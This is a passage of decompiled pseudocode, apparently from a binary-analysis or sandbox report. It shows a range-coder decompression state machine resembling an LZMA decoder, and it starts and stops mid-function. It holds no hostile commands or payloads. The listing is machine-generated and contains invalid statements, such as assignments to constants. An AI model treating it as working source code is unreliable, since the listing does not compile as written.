                                                                    												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                    												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                    												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                    													L10:
                                                                    													if(_t612 == 0) {
                                                                    														L12:
                                                                    														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                    														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                    														goto L15;
                                                                    													} else {
                                                                    														goto L11;
                                                                    													}
                                                                    													do {
                                                                    														L11:
                                                                    														_t612 = _t612 - 1;
                                                                    														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                    													} while (_t612 != 0);
                                                                    													goto L12;
                                                                    												}
                                                                    												if( *(_t613 - 4) != 0) {
                                                                    													GlobalFree( *(_t613 - 4));
                                                                    												}
                                                                    												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                    												 *(_t613 - 4) = _t534;
                                                                    												if(_t534 == 0) {
                                                                    													goto L171;
                                                                    												} else {
                                                                    													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                    													goto L10;
                                                                    												}
                                                                    											case 1:
                                                                    												L13:
                                                                    												__eflags =  *(_t613 - 0x6c);
                                                                    												if( *(_t613 - 0x6c) == 0) {
                                                                    													 *(_t613 - 0x88) = 1;
                                                                    													goto L170;
                                                                    												}
                                                                    												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                    												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                    												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                    												_t45 = _t613 - 0x48;
                                                                    												 *_t45 =  *(_t613 - 0x48) + 1;
                                                                    												__eflags =  *_t45;
                                                                    												L15:
                                                                    												if( *(_t613 - 0x48) < 4) {
                                                                    													goto L13;
                                                                    												}
                                                                    												_t546 =  *(_t613 - 0x40);
                                                                    												if(_t546 ==  *(_t613 - 0x74)) {
                                                                    													L20:
                                                                    													 *(_t613 - 0x48) = 5;
                                                                    													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                    													goto L23;
                                                                    												}
                                                                    												 *(_t613 - 0x74) = _t546;
                                                                    												if( *(_t613 - 8) != 0) {
                                                                    													GlobalFree( *(_t613 - 8));
                                                                    												}
                                                                    												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                    												 *(_t613 - 8) = _t534;
                                                                    												if(_t534 == 0) {
                                                                    													goto L171;
                                                                    												} else {
                                                                    													goto L20;
                                                                    												}
                                                                    											case 2:
                                                                    												L24:
                                                                    												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                    												 *(_t613 - 0x84) = 6;
                                                                    												 *(_t613 - 0x4c) = _t553;
                                                                    												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                    												L132:
                                                                    												 *(_t613 - 0x54) = _t606;
                                                                    												goto L133;
                                                                    											case 3:
                                                                    												L21:
                                                                    												__eflags =  *(_t613 - 0x6c);
                                                                    												if( *(_t613 - 0x6c) == 0) {
                                                                    													 *(_t613 - 0x88) = 3;
                                                                    													goto L170;
                                                                    												}
                                                                    												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                    												_t67 = _t613 - 0x70;
                                                                    												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                    												__eflags =  *_t67;
                                                                    												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                    												L23:
                                                                    												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                    												if( *(_t613 - 0x48) != 0) {
                                                                    													goto L21;
                                                                    												}
                                                                    												goto L24;
                                                                    											case 4:
                                                                    												L133:
                                                                    												_t531 =  *_t606;
                                                                    												_t589 = _t531 & 0x0000ffff;
                                                                    												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                    												if( *(_t613 - 0xc) >= _t565) {
                                                                    													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                    													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                    													 *(_t613 - 0x40) = 1;
                                                                    													_t532 = _t531 - (_t531 >> 5);
                                                                    													 *_t606 = _t532;
                                                                    												} else {
                                                                    													 *(_t613 - 0x10) = _t565;
                                                                    													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                    													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                    												}
                                                                    												if( *(_t613 - 0x10) >= 0x1000000) {
                                                                    													goto L139;
                                                                    												}
                                                                    											case 5:
                                                                    												goto L137;
                                                                    											case 6:
                                                                    												__edx = 0;
                                                                    												__eflags =  *(__ebp - 0x40);
                                                                    												if( *(__ebp - 0x40) != 0) {
                                                                    													__eax =  *(__ebp - 4);
                                                                    													__ecx =  *(__ebp - 0x38);
                                                                    													 *(__ebp - 0x34) = 1;
                                                                    													 *(__ebp - 0x84) = 7;
                                                                    													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                    													while(1) {
                                                                    														L132:
                                                                    														 *(_t613 - 0x54) = _t606;
                                                                    														goto L133;
                                                                    													}
                                                                    												}
                                                                    												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                    												__esi =  *(__ebp - 0x60);
                                                                    												__cl = 8;
                                                                    												__cl = 8 -  *(__ebp - 0x3c);
                                                                    												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                    												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                    												__ecx =  *(__ebp - 0x3c);
                                                                    												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                    												__ecx =  *(__ebp - 4);
                                                                    												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                    												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                    												__eflags =  *(__ebp - 0x38) - 4;
                                                                    												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                    												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                    												if( *(__ebp - 0x38) >= 4) {
                                                                    													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                    													if( *(__ebp - 0x38) >= 0xa) {
                                                                    														_t98 = __ebp - 0x38;
                                                                    														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                    														__eflags =  *_t98;
                                                                    													} else {
                                                                    														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                    													}
                                                                    												} else {
                                                                    													 *(__ebp - 0x38) = 0;
                                                                    												}
                                                                    												__eflags =  *(__ebp - 0x34) - __edx;
                                                                    												if( *(__ebp - 0x34) == __edx) {
                                                                    													__ebx = 0;
                                                                    													__ebx = 1;
                                                                    													goto L61;
                                                                    												} else {
                                                                    													__eax =  *(__ebp - 0x14);
                                                                    													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                    													__eflags = __eax -  *(__ebp - 0x74);
                                                                    													if(__eax >=  *(__ebp - 0x74)) {
                                                                    														__eax = __eax +  *(__ebp - 0x74);
                                                                    														__eflags = __eax;
                                                                    													}
                                                                    													__ecx =  *(__ebp - 8);
                                                                    													__ebx = 0;
                                                                    													__ebx = 1;
                                                                    													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                    													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                    													goto L41;
                                                                    												}
                                                                    											case 7:
                                                                    												__eflags =  *(__ebp - 0x40) - 1;
                                                                    												if( *(__ebp - 0x40) != 1) {
                                                                    													__eax =  *(__ebp - 0x24);
                                                                    													 *(__ebp - 0x80) = 0x16;
                                                                    													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                    													__eax =  *(__ebp - 0x28);
                                                                    													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                    													__eax =  *(__ebp - 0x2c);
                                                                    													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                    													__eax = 0;
                                                                    													__eflags =  *(__ebp - 0x38) - 7;
                                                                    													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                    													__al = __al & 0x000000fd;
                                                                    													__eax = (__eflags >= 0) - 1 + 0xa;
                                                                    													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                    													__eax =  *(__ebp - 4);
                                                                    													__eax =  *(__ebp - 4) + 0x664;
                                                                    													__eflags = __eax;
                                                                    													 *(__ebp - 0x58) = __eax;
                                                                    													goto L69;
                                                                    												}
                                                                    												__eax =  *(__ebp - 4);
                                                                    												__ecx =  *(__ebp - 0x38);
                                                                    												 *(__ebp - 0x84) = 8;
                                                                    												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                    												while(1) {
                                                                    													L132:
                                                                    													 *(_t613 - 0x54) = _t606;
                                                                    													goto L133;
                                                                    												}
                                                                    											case 8:
                                                                    												__eflags =  *(__ebp - 0x40);
                                                                    												if( *(__ebp - 0x40) != 0) {
                                                                    													__eax =  *(__ebp - 4);
                                                                    													__ecx =  *(__ebp - 0x38);
                                                                    													 *(__ebp - 0x84) = 0xa;
                                                                    													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                    												} else {
                                                                    													__eax =  *(__ebp - 0x38);
                                                                    													__ecx =  *(__ebp - 4);
                                                                    													__eax =  *(__ebp - 0x38) + 0xf;
                                                                    													 *(__ebp - 0x84) = 9;
                                                                    													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                    													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                    												}
                                                                    												while(1) {
                                                                    													L132:
                                                                    													 *(_t613 - 0x54) = _t606;
                                                                    													goto L133;
                                                                    												}
                                                                    											case 9:
                                                                    												__eflags =  *(__ebp - 0x40);
                                                                    												if( *(__ebp - 0x40) != 0) {
                                                                    													goto L89;
                                                                    												}
                                                                    												__eflags =  *(__ebp - 0x60);
                                                                    												if( *(__ebp - 0x60) == 0) {
                                                                    													goto L171;
                                                                    												}
                                                                    												__eax = 0;
                                                                    												__eflags =  *(__ebp - 0x38) - 7;
                                                                    												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                    												__eflags = _t259;
                                                                    												0 | _t259 = _t259 + _t259 + 9;
                                                                    												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                    												goto L76;
                                                                    											case 0xa:
                                                                    												goto L0;
                                                                    											case 0xb:
                                                                    												__eflags =  *(__ebp - 0x40);
                                                                    												if( *(__ebp - 0x40) != 0) {
                                                                    													__ecx =  *(__ebp - 0x24);
                                                                    													__eax =  *(__ebp - 0x20);
                                                                    													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                    												} else {
                                                                    													__eax =  *(__ebp - 0x24);
                                                                    												}
                                                                    												__ecx =  *(__ebp - 0x28);
                                                                    												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                    												goto L88;
                                                                    											case 0xc:
                                                                    												L99:
                                                                    												__eflags =  *(__ebp - 0x6c);
                                                                    												if( *(__ebp - 0x6c) == 0) {
                                                                    													 *(__ebp - 0x88) = 0xc;
                                                                    													goto L170;
                                                                    												}
                                                                    												__ecx =  *(__ebp - 0x70);
                                                                    												__eax =  *(__ebp - 0xc);
                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												_t334 = __ebp - 0x70;
                                                                    												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                    												__eflags =  *_t334;
                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												__eax =  *(__ebp - 0x2c);
                                                                    												goto L101;
                                                                    											case 0xd:
                                                                    												L37:
                                                                    												__eflags =  *(__ebp - 0x6c);
                                                                    												if( *(__ebp - 0x6c) == 0) {
                                                                    													 *(__ebp - 0x88) = 0xd;
                                                                    													goto L170;
                                                                    												}
                                                                    												__ecx =  *(__ebp - 0x70);
                                                                    												__eax =  *(__ebp - 0xc);
                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												_t122 = __ebp - 0x70;
                                                                    												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                    												__eflags =  *_t122;
                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												L39:
                                                                    												__eax =  *(__ebp - 0x40);
                                                                    												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                    												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                    													goto L48;
                                                                    												}
                                                                    												__eflags = __ebx - 0x100;
                                                                    												if(__ebx >= 0x100) {
                                                                    													goto L54;
                                                                    												}
                                                                    												L41:
                                                                    												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                    												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                    												__ecx =  *(__ebp - 0x58);
                                                                    												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                    												 *(__ebp - 0x48) = __eax;
                                                                    												__eax = __eax + 1;
                                                                    												__eax = __eax << 8;
                                                                    												__eax = __eax + __ebx;
                                                                    												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                    												__ax =  *__esi;
                                                                    												 *(__ebp - 0x54) = __esi;
                                                                    												__edx = __ax & 0x0000ffff;
                                                                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                    												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                    												if( *(__ebp - 0xc) >= __ecx) {
                                                                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                    													__cx = __ax;
                                                                    													 *(__ebp - 0x40) = 1;
                                                                    													__cx = __ax >> 5;
                                                                    													__eflags = __eax;
                                                                    													__ebx = __ebx + __ebx + 1;
                                                                    													 *__esi = __ax;
                                                                    												} else {
                                                                    													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                    													 *(__ebp - 0x10) = __ecx;
                                                                    													0x800 = 0x800 - __edx;
                                                                    													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                    													__ebx = __ebx + __ebx;
                                                                    													 *__esi = __cx;
                                                                    												}
                                                                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                    												 *(__ebp - 0x44) = __ebx;
                                                                    												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    													goto L39;
                                                                    												} else {
                                                                    													goto L37;
                                                                    												}
                                                                    											case 0xe:
                                                                    												L46:
                                                                    												__eflags =  *(__ebp - 0x6c);
                                                                    												if( *(__ebp - 0x6c) == 0) {
                                                                    													 *(__ebp - 0x88) = 0xe;
                                                                    													goto L170;
                                                                    												}
                                                                    												__ecx =  *(__ebp - 0x70);
                                                                    												__eax =  *(__ebp - 0xc);
                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												_t156 = __ebp - 0x70;
                                                                    												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                    												__eflags =  *_t156;
                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												while(1) {
                                                                    													L48:
                                                                    													__eflags = __ebx - 0x100;
                                                                    													if(__ebx >= 0x100) {
                                                                    														break;
                                                                    													}
                                                                    													__eax =  *(__ebp - 0x58);
                                                                    													__edx = __ebx + __ebx;
                                                                    													__ecx =  *(__ebp - 0x10);
                                                                    													__esi = __edx + __eax;
                                                                    													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                    													__ax =  *__esi;
                                                                    													 *(__ebp - 0x54) = __esi;
                                                                    													__edi = __ax & 0x0000ffff;
                                                                    													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                    													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                    													if( *(__ebp - 0xc) >= __ecx) {
                                                                    														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                    														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                    														__cx = __ax;
                                                                    														_t170 = __edx + 1; // 0x1
                                                                    														__ebx = _t170;
                                                                    														__cx = __ax >> 5;
                                                                    														__eflags = __eax;
                                                                    														 *__esi = __ax;
                                                                    													} else {
                                                                    														 *(__ebp - 0x10) = __ecx;
                                                                    														0x800 = 0x800 - __edi;
                                                                    														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                    														__ebx = __ebx + __ebx;
                                                                    														 *__esi = __cx;
                                                                    													}
                                                                    													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                    													 *(__ebp - 0x44) = __ebx;
                                                                    													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    														continue;
                                                                    													} else {
                                                                    														goto L46;
                                                                    													}
                                                                    												}
                                                                    												L54:
                                                                    												_t173 = __ebp - 0x34;
                                                                    												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                    												__eflags =  *_t173;
                                                                    												goto L55;
                                                                    											case 0xf:
                                                                    												L58:
                                                                    												__eflags =  *(__ebp - 0x6c);
                                                                    												if( *(__ebp - 0x6c) == 0) {
                                                                    													 *(__ebp - 0x88) = 0xf;
                                                                    													goto L170;
                                                                    												}
                                                                    												__ecx =  *(__ebp - 0x70);
                                                                    												__eax =  *(__ebp - 0xc);
                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												_t203 = __ebp - 0x70;
                                                                    												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                    												__eflags =  *_t203;
                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												L60:
                                                                    												__eflags = __ebx - 0x100;
                                                                    												if(__ebx >= 0x100) {
                                                                    													L55:
                                                                    													__al =  *(__ebp - 0x44);
                                                                    													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                    													goto L56;
                                                                    												}
                                                                    												L61:
                                                                    												__eax =  *(__ebp - 0x58);
                                                                    												__edx = __ebx + __ebx;
                                                                    												__ecx =  *(__ebp - 0x10);
                                                                    												__esi = __edx + __eax;
                                                                    												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                    												__ax =  *__esi;
                                                                    												 *(__ebp - 0x54) = __esi;
                                                                    												__edi = __ax & 0x0000ffff;
                                                                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                    												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                    												if( *(__ebp - 0xc) >= __ecx) {
                                                                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                    													__cx = __ax;
                                                                    													_t217 = __edx + 1; // 0x1
                                                                    													__ebx = _t217;
                                                                    													__cx = __ax >> 5;
                                                                    													__eflags = __eax;
                                                                    													 *__esi = __ax;
                                                                    												} else {
                                                                    													 *(__ebp - 0x10) = __ecx;
                                                                    													0x800 = 0x800 - __edi;
                                                                    													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                    													__ebx = __ebx + __ebx;
                                                                    													 *__esi = __cx;
                                                                    												}
                                                                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                    												 *(__ebp - 0x44) = __ebx;
                                                                    												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    													goto L60;
                                                                    												} else {
                                                                    													goto L58;
                                                                    												}
                                                                    											case 0x10:
                                                                    												L109:
                                                                    												__eflags =  *(__ebp - 0x6c);
                                                                    												if( *(__ebp - 0x6c) == 0) {
                                                                    													 *(__ebp - 0x88) = 0x10;
                                                                    													goto L170;
                                                                    												}
                                                                    												__ecx =  *(__ebp - 0x70);
                                                                    												__eax =  *(__ebp - 0xc);
                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												_t365 = __ebp - 0x70;
                                                                    												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                    												__eflags =  *_t365;
                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												goto L111;
                                                                    											case 0x11:
                                                                    												goto L69;
                                                                    											case 0x12:
                                                                    												__eflags =  *(__ebp - 0x40);
                                                                    												if( *(__ebp - 0x40) != 0) {
                                                                    													__eax =  *(__ebp - 0x58);
                                                                    													 *(__ebp - 0x84) = 0x13;
                                                                    													__esi =  *(__ebp - 0x58) + 2;
                                                                    													while(1) {
                                                                    														L132:
                                                                    														 *(_t613 - 0x54) = _t606;
                                                                    														goto L133;
                                                                    													}
                                                                    												}
                                                                    												__eax =  *(__ebp - 0x4c);
                                                                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                    												__ecx =  *(__ebp - 0x58);
                                                                    												__eax =  *(__ebp - 0x4c) << 4;
                                                                    												__eflags = __eax;
                                                                    												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                    												goto L130;
                                                                    											case 0x13:
                                                                    												__eflags =  *(__ebp - 0x40);
                                                                    												if( *(__ebp - 0x40) != 0) {
                                                                    													_t469 = __ebp - 0x58;
                                                                    													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                    													__eflags =  *_t469;
                                                                    													 *(__ebp - 0x30) = 0x10;
                                                                    													 *(__ebp - 0x40) = 8;
                                                                    													L144:
                                                                    													 *(__ebp - 0x7c) = 0x14;
                                                                    													goto L145;
                                                                    												}
                                                                    												__eax =  *(__ebp - 0x4c);
                                                                    												__ecx =  *(__ebp - 0x58);
                                                                    												__eax =  *(__ebp - 0x4c) << 4;
                                                                    												 *(__ebp - 0x30) = 8;
                                                                    												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                    												L130:
                                                                    												 *(__ebp - 0x58) = __eax;
                                                                    												 *(__ebp - 0x40) = 3;
                                                                    												goto L144;
                                                                    											case 0x14:
                                                                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                    												__eax =  *(__ebp - 0x80);
                                                                    												 *(_t613 - 0x88) = _t533;
                                                                    												goto L1;
                                                                    											case 0x15:
                                                                    												__eax = 0;
                                                                    												__eflags =  *(__ebp - 0x38) - 7;
                                                                    												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                    												__al = __al & 0x000000fd;
                                                                    												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                    												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                    												goto L120;
                                                                    											case 0x16:
                                                                    												__eax =  *(__ebp - 0x30);
                                                                    												__eflags = __eax - 4;
                                                                    												if(__eax >= 4) {
                                                                    													_push(3);
                                                                    													_pop(__eax);
                                                                    												}
                                                                    												__ecx =  *(__ebp - 4);
                                                                    												 *(__ebp - 0x40) = 6;
                                                                    												__eax = __eax << 7;
                                                                    												 *(__ebp - 0x7c) = 0x19;
                                                                    												 *(__ebp - 0x58) = __eax;
                                                                    												goto L145;
                                                                    											case 0x17:
                                                                    												L145:
                                                                    												__eax =  *(__ebp - 0x40);
                                                                    												 *(__ebp - 0x50) = 1;
                                                                    												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                    												goto L149;
                                                                    											case 0x18:
                                                                    												L146:
                                                                    												__eflags =  *(__ebp - 0x6c);
                                                                    												if( *(__ebp - 0x6c) == 0) {
                                                                    													 *(__ebp - 0x88) = 0x18;
                                                                    													goto L170;
                                                                    												}
                                                                    												__ecx =  *(__ebp - 0x70);
                                                                    												__eax =  *(__ebp - 0xc);
                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												_t484 = __ebp - 0x70;
                                                                    												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                    												__eflags =  *_t484;
                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												L148:
                                                                    												_t487 = __ebp - 0x48;
                                                                    												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                    												__eflags =  *_t487;
                                                                    												L149:
                                                                    												__eflags =  *(__ebp - 0x48);
                                                                    												if( *(__ebp - 0x48) <= 0) {
                                                                    													__ecx =  *(__ebp - 0x40);
                                                                    													__ebx =  *(__ebp - 0x50);
                                                                    													0 = 1;
                                                                    													__eax = 1 << __cl;
                                                                    													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                    													__eax =  *(__ebp - 0x7c);
                                                                    													 *(__ebp - 0x44) = __ebx;
                                                                    													while(1) {
                                                                    														 *(_t613 - 0x88) = _t533;
                                                                    														goto L1;
                                                                    													}
                                                                    												}
                                                                    												__eax =  *(__ebp - 0x50);
                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                    												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                    												__eax =  *(__ebp - 0x58);
                                                                    												__esi = __edx + __eax;
                                                                    												 *(__ebp - 0x54) = __esi;
                                                                    												__ax =  *__esi;
                                                                    												__edi = __ax & 0x0000ffff;
                                                                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                    												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                    												if( *(__ebp - 0xc) >= __ecx) {
                                                                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                    													__cx = __ax;
                                                                    													__cx = __ax >> 5;
                                                                    													__eax = __eax - __ecx;
                                                                    													__edx = __edx + 1;
                                                                    													__eflags = __edx;
                                                                    													 *__esi = __ax;
                                                                    													 *(__ebp - 0x50) = __edx;
                                                                    												} else {
                                                                    													 *(__ebp - 0x10) = __ecx;
                                                                    													0x800 = 0x800 - __edi;
                                                                    													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                    													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                    													 *__esi = __cx;
                                                                    												}
